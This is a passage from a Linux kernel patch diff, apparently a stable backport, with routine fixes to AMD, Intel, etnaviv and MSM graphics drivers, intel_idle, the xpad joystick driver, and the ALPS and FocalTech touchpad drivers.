++	 * avoiding double free issues.
++	 */
++	mutex_lock(&kfd_processes_mutex);
++	hash_for_each_safe(kfd_processes_table, temp, p_temp, p, kfd_processes) {
++		hash_del_rcu(&p->kfd_processes);
++		synchronize_srcu(&kfd_processes_srcu);
++		hlist_add_head(&p->kfd_processes, &cleanup_list);
++	}
++	mutex_unlock(&kfd_processes_mutex);
++
++	hlist_for_each_entry_safe(p, p_temp, &cleanup_list, kfd_processes)
++		kfd_process_notifier_release_internal(p);
++
++	/*
++	 * Ensures that all outstanding free_notifier get called, triggering
++	 * the release of the kfd_process struct.
++	 */
++	mmu_notifier_synchronize();
++}
++
+ static int kfd_process_init_cwsr_apu(struct kfd_process *p, struct file *filep)
+ {
+ 	unsigned long  offset;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+index 5137476ec18e6..4236539d9f932 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+@@ -218,8 +218,8 @@ static int init_user_queue(struct process_queue_manager *pqm,
+ 	return 0;
+ 
+ cleanup:
+-	if (dev->shared_resources.enable_mes)
+-		uninit_queue(*q);
++	uninit_queue(*q);
++	*q = NULL;
+ 	return retval;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 8561e9b017a2e..df74bc88e4600 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -208,6 +208,21 @@ bool needs_dsc_aux_workaround(struct dc_link *link)
+ 	return false;
+ }
+ 
++bool is_synaptics_cascaded_panamera(struct dc_link *link, struct drm_dp_mst_port *port)
++{
++	u8 branch_vendor_data[4] = { 0 }; // Vendor data 0x50C ~ 0x50F
++
++	if (drm_dp_dpcd_read(port->mgr->aux, DP_BRANCH_VENDOR_SPECIFIC_START, &branch_vendor_data, 4) == 4) {
++		if (link->dpcd_caps.branch_dev_id == DP_BRANCH_DEVICE_ID_90CC24 &&
++				IS_SYNAPTICS_CASCADED_PANAMERA(link->dpcd_caps.branch_dev_name, branch_vendor_data)) {
++			DRM_INFO("Synaptics Cascaded MST hub\n");
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnector)
+ {
+ 	struct dc_sink *dc_sink = aconnector->dc_sink;
+@@ -231,6 +246,10 @@ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnecto
+ 	    needs_dsc_aux_workaround(aconnector->dc_link))
+ 		aconnector->dsc_aux = &aconnector->mst_port->dm_dp_aux.aux;
+ 
++	/* synaptics cascaded MST hub case */
++	if (!aconnector->dsc_aux && is_synaptics_cascaded_panamera(aconnector->dc_link, port))
++		aconnector->dsc_aux = port->mgr->aux;
++
+ 	if (!aconnector->dsc_aux)
+ 		return false;
+ 
+@@ -627,12 +646,25 @@ struct dsc_mst_fairness_params {
+ 	struct amdgpu_dm_connector *aconnector;
+ };
+ 
+-static int kbps_to_peak_pbn(int kbps)
++static uint16_t get_fec_overhead_multiplier(struct dc_link *dc_link)
++{
++	u8 link_coding_cap;
++	uint16_t fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B;
++
++	link_coding_cap = dc_link_dp_mst_decide_link_encoding_format(dc_link);
++	if (link_coding_cap == DP_128b_132b_ENCODING)
++		fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B;
++
++	return fec_overhead_multiplier_x1000;
++}
++
++static int kbps_to_peak_pbn(int kbps, uint16_t fec_overhead_multiplier_x1000)
+ {
+ 	u64 peak_kbps = kbps;
+ 
+ 	peak_kbps *= 1006;
+-	peak_kbps = div_u64(peak_kbps, 1000);
++	peak_kbps *= fec_overhead_multiplier_x1000;
++	peak_kbps = div_u64(peak_kbps, 1000 * 1000);
+ 	return (int) DIV64_U64_ROUND_UP(peak_kbps * 64, (54 * 8 * 1000));
+ }
+ 
+@@ -719,11 +751,12 @@ static int increase_dsc_bpp(struct drm_atomic_state *state,
+ 	int link_timeslots_used;
+ 	int fair_pbn_alloc;
+ 	int ret = 0;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled) {
+ 			initial_slack[i] =
+-			kbps_to_peak_pbn(params[i].bw_range.max_kbps) - vars[i + k].pbn;
++			kbps_to_peak_pbn(params[i].bw_range.max_kbps, fec_overhead_multiplier_x1000) - vars[i + k].pbn;
+ 			bpp_increased[i] = false;
+ 			remaining_to_increase += 1;
+ 		} else {
+@@ -819,6 +852,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 	int next_index;
+ 	int remaining_to_try = 0;
+ 	int ret;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled
+@@ -848,7 +882,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 		if (next_index == -1)
+ 			break;
+ 
+-		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps);
++		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		ret = drm_dp_atomic_find_time_slots(state,
+ 						    params[next_index].port->mgr,
+ 						    params[next_index].port,
+@@ -861,7 +895,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 			vars[next_index].dsc_enabled = false;
+ 			vars[next_index].bpp_x16 = 0;
+ 		} else {
+-			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps);
++			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps, fec_overhead_multiplier_x1000);
+ 			ret = drm_dp_atomic_find_time_slots(state,
+ 							    params[next_index].port->mgr,
+ 							    params[next_index].port,
+@@ -890,6 +924,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	int count = 0;
+ 	int i, k, ret;
+ 	bool debugfs_overwrite = false;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	memset(params, 0, sizeof(params));
+ 
+@@ -951,7 +986,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try no compression */
+ 	for (i = 0; i < count; i++) {
+ 		vars[i + k].aconnector = params[i].aconnector;
+-		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		vars[i + k].dsc_enabled = false;
+ 		vars[i + k].bpp_x16 = 0;
+ 		ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr, params[i].port,
+@@ -970,7 +1005,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try max compression */
+ 	for (i = 0; i < count; i++) {
+ 		if (params[i].compression_possible && params[i].clock_force_enable != DSC_CLK_FORCE_DISABLE) {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = true;
+ 			vars[i + k].bpp_x16 = params[i].bw_range.min_target_bpp_x16;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+@@ -978,7 +1013,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 			if (ret < 0)
+ 				return ret;
+ 		} else {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = false;
+ 			vars[i + k].bpp_x16 = 0;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+index 97fd70df531bf..1e4ede1e57abd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+@@ -34,6 +34,21 @@
+ #define SYNAPTICS_RC_OFFSET        0x4BC
+ #define SYNAPTICS_RC_DATA          0x4C0
+ 
++#define DP_BRANCH_VENDOR_SPECIFIC_START 0x50C
++
++/**
++ * Panamera MST Hub detection
++ * Offset DPCD 050Eh == 0x5A indicates cascaded MST hub case
++ * Check from beginning of branch device vendor specific field (050Ch)
++ */
++#define IS_SYNAPTICS_PANAMERA(branchDevName) (((int)branchDevName[4] & 0xF0) == 0x50 ? 1 : 0)
++#define BRANCH_HW_REVISION_PANAMERA_A2 0x10
++#define SYNAPTICS_CASCADED_HUB_ID  0x5A
++#define IS_SYNAPTICS_CASCADED_PANAMERA(devName, data) ((IS_SYNAPTICS_PANAMERA(devName) && ((int)data[2] == SYNAPTICS_CASCADED_HUB_ID)) ? 1 : 0)
++
++#define PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B	1031
++#define PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B	1000
++
+ struct amdgpu_display_manager;
+ struct amdgpu_dm_connector;
+ 
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+index 3fa2da1496398..fc594ea5bbc1d 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+@@ -91,7 +91,15 @@ static void *etnaviv_gem_prime_vmap_impl(struct etnaviv_gem_object *etnaviv_obj)
+ static int etnaviv_gem_prime_mmap_obj(struct etnaviv_gem_object *etnaviv_obj,
+ 		struct vm_area_struct *vma)
+ {
+-	return dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	int ret;
++
++	ret = dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	if (!ret) {
++		/* Drop the reference acquired by drm_gem_mmap_obj(). */
++		drm_gem_object_put(&etnaviv_obj->base);
++	}
++
++	return ret;
+ }
+ 
+ static const struct etnaviv_gem_ops etnaviv_gem_prime_ops = {
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index 6bda4274eae92..c85757f55112b 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -499,6 +499,22 @@ static void icl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ 	icl_load_csc_matrix(crtc_state);
+ }
+ 
++static void skl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
++{
++	/*
++	 * Possibly related to display WA #1184, SKL CSC loses the latched
++	 * CSC coeff/offset register values if the CSC registers are disarmed
++	 * between DC5 exit and PSR exit. This will cause the plane(s) to
++	 * output all black (until CSC_MODE is rearmed and properly latched).
++	 * Once PSR exit (and proper register latching) has occurred the
++	 * danger is over. Thus when PSR is enabled the CSC coeff/offset
++	 * register programming will be peformed from skl_color_commit_arm()
++	 * which is called after PSR exit.
++	 */
++	if (!crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++}
++
+ static void ilk_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ {
+ 	ilk_load_csc_matrix(crtc_state);
+@@ -541,6 +557,9 @@ static void skl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 	enum pipe pipe = crtc->pipe;
+ 	u32 val = 0;
+ 
++	if (crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++
+ 	/*
+ 	 * We don't (yet) allow userspace to control the pipe background color,
+ 	 * so force it to black, but apply pipe gamma and CSC appropriately
+@@ -2171,7 +2190,7 @@ static const struct intel_color_funcs icl_color_funcs = {
+ 
+ static const struct intel_color_funcs glk_color_funcs = {
+ 	.color_check = glk_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = glk_load_luts,
+ 	.read_luts = glk_read_luts,
+@@ -2179,7 +2198,7 @@ static const struct intel_color_funcs glk_color_funcs = {
+ 
+ static const struct intel_color_funcs skl_color_funcs = {
+ 	.color_check = ivb_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = bdw_load_luts,
+ 	.read_luts = NULL,
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index e0d36edd1e3fb..3f3982ae9974b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -7124,6 +7124,8 @@ static void intel_update_crtc(struct intel_atomic_state *state,
+ 
+ 	intel_fbc_update(state, crtc);
+ 
++	drm_WARN_ON(&i915->drm, !intel_display_power_is_enabled(i915, POWER_DOMAIN_DC_OFF));
++
+ 	if (!modeset &&
+ 	    (new_crtc_state->uapi.color_mgmt_changed ||
+ 	     new_crtc_state->update_pipe))
+@@ -7500,8 +7502,28 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 	drm_atomic_helper_wait_for_dependencies(&state->base);
+ 	drm_dp_mst_atomic_wait_for_dependencies(&state->base);
+ 
+-	if (state->modeset)
+-		wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_MODESET);
++	/*
++	 * During full modesets we write a lot of registers, wait
++	 * for PLLs, etc. Doing that while DC states are enabled
++	 * is not a good idea.
++	 *
++	 * During fastsets and other updates we also need to
++	 * disable DC states due to the following scenario:
++	 * 1. DC5 exit and PSR exit happen
++	 * 2. Some or all _noarm() registers are written
++	 * 3. Due to some long delay PSR is re-entered
++	 * 4. DC5 entry -> DMC saves the already written new
++	 *    _noarm() registers and the old not yet written
++	 *    _arm() registers
++	 * 5. DC5 exit -> DMC restores a mixture of old and
++	 *    new register values and arms the update
++	 * 6. PSR exit -> hardware latches a mixture of old and
++	 *    new register values -> corrupted frame, or worse
++	 * 7. New _arm() registers are finally written
++	 * 8. Hardware finally latches a complete set of new
++	 *    register values, and subsequent frames will be OK again
++	 */
++	wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_DC_OFF);
+ 
+ 	intel_atomic_prepare_plane_clear_colors(state);
+ 
+@@ -7640,8 +7662,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * the culprit.
+ 		 */
+ 		intel_uncore_arm_unclaimed_mmio_detection(&dev_priv->uncore);
+-		intel_display_power_put(dev_priv, POWER_DOMAIN_MODESET, wakeref);
+ 	}
++	intel_display_power_put(dev_priv, POWER_DOMAIN_DC_OFF, wakeref);
+ 	intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/i915/display/intel_dpt.c b/drivers/gpu/drm/i915/display/intel_dpt.c
+index ac587647e1f50..a3893aff38611 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpt.c
++++ b/drivers/gpu/drm/i915/display/intel_dpt.c
+@@ -300,6 +300,7 @@ intel_dpt_create(struct intel_framebuffer *fb)
+ 	vm->pte_encode = gen8_ggtt_pte_encode;
+ 
+ 	dpt->obj = dpt_obj;
++	dpt->obj->is_dpt = true;
+ 
+ 	return &dpt->vm;
+ }
+@@ -308,5 +309,6 @@ void intel_dpt_destroy(struct i915_address_space *vm)
+ {
+ 	struct i915_dpt *dpt = i915_vm_to_dpt(vm);
+ 
++	dpt->obj->is_dpt = false;
+ 	i915_vm_put(&dpt->vm);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.c b/drivers/gpu/drm/i915/display/intel_tc.c
+index e5af955b5600f..8d6dac32c8960 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.c
++++ b/drivers/gpu/drm/i915/display/intel_tc.c
+@@ -440,9 +440,9 @@ static bool icl_tc_phy_is_owned(struct intel_digital_port *dig_port)
+ 				PORT_TX_DFLEXDPCSSS(dig_port->tc_phy_fia));
+ 	if (val == 0xffffffff) {
+ 		drm_dbg_kms(&i915->drm,
+-			    "Port %s: PHY in TCCOLD, assume safe mode\n",
++			    "Port %s: PHY in TCCOLD, assume not owned\n",
+ 			    dig_port->tc_port_name);
+-		return true;
++		return false;
+ 	}
+ 
+ 	return val & DP_PHY_MODE_STATUS_NOT_SAFE(dig_port->tc_phy_fia_idx);
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+index 8949fb0a944f6..3198b64ad7dbc 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+@@ -127,7 +127,8 @@ i915_gem_object_create_lmem_from_data(struct drm_i915_private *i915,
+ 
+ 	memcpy(map, data, size);
+ 
+-	i915_gem_object_unpin_map(obj);
++	i915_gem_object_flush_map(obj);
++	__i915_gem_object_release_map(obj);
+ 
+ 	return obj;
+ }
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.h b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+index 1723af9b0f6a2..ea951e2f55b17 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+@@ -319,7 +319,7 @@ i915_gem_object_never_mmap(const struct drm_i915_gem_object *obj)
+ static inline bool
+ i915_gem_object_is_framebuffer(const struct drm_i915_gem_object *obj)
+ {
+-	return READ_ONCE(obj->frontbuffer);
++	return READ_ONCE(obj->frontbuffer) || obj->is_dpt;
+ }
+ 
+ static inline unsigned int
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+index ab4c2f90a5643..1d0d8ee9d707d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+@@ -491,6 +491,9 @@ struct drm_i915_gem_object {
+ 	 */
+ 	unsigned int cache_dirty:1;
+ 
++	/* @is_dpt: Object houses a display page table (DPT) */
++	unsigned int is_dpt:1;
++
+ 	/**
+ 	 * @read_domains: Read memory domains.
+ 	 *
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 41c93a18d5cb3..32a3c42ec45b1 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -356,7 +356,7 @@ static const struct dpu_caps sc8180x_dpu_caps = {
+ static const struct dpu_caps sm8250_dpu_caps = {
+ 	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0xb,
+-	.qseed_type = DPU_SSPP_SCALER_QSEED3LITE,
++	.qseed_type = DPU_SSPP_SCALER_QSEED4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2, /* TODO: v2.5 */
+ 	.ubwc_version = DPU_HW_UBWC_VER_40,
+ 	.has_src_split = true,
+@@ -855,22 +855,22 @@ static const struct dpu_sspp_cfg sc7180_sspp[] = {
+ };
+ 
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_0 =
+-				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_1 =
+-				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_2 =
+-				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_3 =
+-				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED4);
+ 
+ static const struct dpu_sspp_cfg sm8250_sspp[] = {
+-	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_0, 0,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG0),
+-	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_1, 4,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG1),
+-	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_2, 8, SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG2),
+-	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_3, 12,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG3),
+ 	SSPP_BLK("sspp_8", SSPP_DMA0, 0x24000,  DMA_SDM845_MASK,
+ 		sdm845_dma_sblk_0, 1, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA0),
+@@ -1180,6 +1180,13 @@ static const struct dpu_pingpong_cfg sm8150_pp[] = {
+ 			-1),
+ };
+ 
++static const struct dpu_pingpong_cfg sc7280_pp[] = {
++	PP_BLK("pingpong_0", PINGPONG_0, 0x69000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_1", PINGPONG_1, 0x6a000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_2", PINGPONG_2, 0x6b000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_3", PINGPONG_3, 0x6c000, 0, sc7280_pp_sblk, -1, -1),
++};
++
+ static struct dpu_pingpong_cfg qcm2290_pp[] = {
+ 	PP_BLK("pingpong_0", PINGPONG_0, 0x70000, 0, sdm845_pp_sblk,
+ 		DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR, 8),
+@@ -1203,13 +1210,6 @@ static const struct dpu_merge_3d_cfg sm8150_merge_3d[] = {
+ 	MERGE_3D_BLK("merge_3d_2", MERGE_3D_2, 0x83200),
+ };
+ 
+-static const struct dpu_pingpong_cfg sc7280_pp[] = {
+-	PP_BLK("pingpong_0", PINGPONG_0, 0x59000, 0, sc7280_pp_sblk, -1, -1),
+-	PP_BLK("pingpong_1", PINGPONG_1, 0x6a000, 0, sc7280_pp_sblk, -1, -1),
+-	PP_BLK("pingpong_2", PINGPONG_2, 0x6b000, 0, sc7280_pp_sblk, -1, -1),
+-	PP_BLK("pingpong_3", PINGPONG_3, 0x6c000, 0, sc7280_pp_sblk, -1, -1),
+-};
+-
+ /*************************************************************
+  * DSC sub blocks config
+  *************************************************************/
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index f060ac7376e69..cfeb24d40d378 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,7 +168,13 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-	raw_local_irq_disable();
++
++	/*
++	 * The lockdep hardirqs state may be changed to 'on' with timer
++	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
++	 * to keep the hardirqs state correct.
++	 */
++	local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 2959d80f7fdb6..cd36cf7165423 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -779,9 +779,6 @@ static void xpad_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char *d
+ 	input_report_key(dev, BTN_C, data[8]);
+ 	input_report_key(dev, BTN_Z, data[9]);
+ 
+-	/* Profile button has a value of 0-3, so it is reported as an axis */
+-	if (xpad->mapping & MAP_PROFILE_BUTTON)
+-		input_report_abs(dev, ABS_PROFILE, data[34]);
+ 
+ 	input_sync(dev);
+ }
+@@ -1059,6 +1056,10 @@ static void xpadone_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char
+ 					(__u16) le16_to_cpup((__le16 *)(data + 8)));
+ 		}
+ 
++		/* Profile button has a value of 0-3, so it is reported as an axis */
++		if (xpad->mapping & MAP_PROFILE_BUTTON)
++			input_report_abs(dev, ABS_PROFILE, data[34]);
++
+ 		/* paddle handling */
+ 		/* based on SDL's SDL_hidapi_xboxone.c */
+ 		if (xpad->mapping & MAP_PADDLES) {
+diff --git a/drivers/input/mouse/alps.c b/drivers/input/mouse/alps.c
+index 4a6b33bbe7eaf..dd08ce97e7c90 100644
+--- a/drivers/input/mouse/alps.c
++++ b/drivers/input/mouse/alps.c
+@@ -852,8 +852,8 @@ static void alps_process_packet_v6(struct psmouse *psmouse)
+ 			x = y = z = 0;
+ 
+ 		/* Divide 4 since trackpoint's speed is too fast */
+-		input_report_rel(dev2, REL_X, (char)x / 4);
+-		input_report_rel(dev2, REL_Y, -((char)y / 4));
++		input_report_rel(dev2, REL_X, (s8)x / 4);
++		input_report_rel(dev2, REL_Y, -((s8)y / 4));
+ 
+ 		psmouse_report_standard_buttons(dev2, packet[3]);
+ 
+@@ -1104,8 +1104,8 @@ static void alps_process_trackstick_packet_v7(struct psmouse *psmouse)
+ 	    ((packet[3] & 0x20) << 1);
+ 	z = (packet[5] & 0x3f) | ((packet[3] & 0x80) >> 1);
+ 
+-	input_report_rel(dev2, REL_X, (char)x);
+-	input_report_rel(dev2, REL_Y, -((char)y));
++	input_report_rel(dev2, REL_X, (s8)x);
++	input_report_rel(dev2, REL_Y, -((s8)y));
+ 	input_report_abs(dev2, ABS_PRESSURE, z);
+ 
+ 	psmouse_report_standard_buttons(dev2, packet[1]);
+@@ -2294,20 +2294,20 @@ static int alps_get_v3_v7_resolution(struct psmouse *psmouse, int reg_pitch)
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_pitch = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_pitch = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_pitch = 50 + 2 * x_pitch; /* In 0.1 mm units */
+ 
+-	y_pitch = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_pitch = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_pitch = 36 + 2 * y_pitch; /* In 0.1 mm units */
+ 
+ 	reg = alps_command_mode_read_reg(psmouse, reg_pitch + 1);
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_electrode = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_electrode = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_electrode = 17 + x_electrode;
+ 
+-	y_electrode = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_electrode = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_electrode = 13 + y_electrode;
+ 
+ 	x_phys = x_pitch * (x_electrode - 1); /* In 0.1 mm units */
+diff --git a/drivers/input/mouse/focaltech.c b/drivers/input/mouse/focaltech.c
+index 6fd5fff0cbfff..c74b99077d16a 100644
+--- a/drivers/input/mouse/focaltech.c
++++ b/drivers/input/mouse/focaltech.c
+@@ -202,8 +202,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	state->pressed = packet[0] >> 7;
+ 	finger1 = ((packet[0] >> 4) & 0x7) - 1;
+ 	if (finger1 < FOC_MAX_FINGERS) {
+-		state->fingers[finger1].x += (char)packet[1];
+-		state->fingers[finger1].y += (char)packet[2];
++		state->fingers[finger1].x += (s8)packet[1];
++		state->fingers[finger1].y += (s8)packet[2];
+ 	} else {
+ 		psmouse_err(psmouse, "First finger in rel packet invalid: %d\n",
+ 			    finger1);
+@@ -218,8 +218,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	 */
+ 	finger2 = ((packet[3] >> 4) & 0x7) - 1;
+ 	if (finger2 < FOC_MAX_FINGERS) {
+-		state->fingers[finger2].x += (char)packet[4];
+-		state->fingers[finger2].y += (char)packet[5];
++		state->fingers[finger2].x += (s8)packet[4];
++		state->fingers[finger2].y += (s8)packet[5];
+ 	}
+ }
+ 
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index efc61736099b9..028e45bd050bf 100644
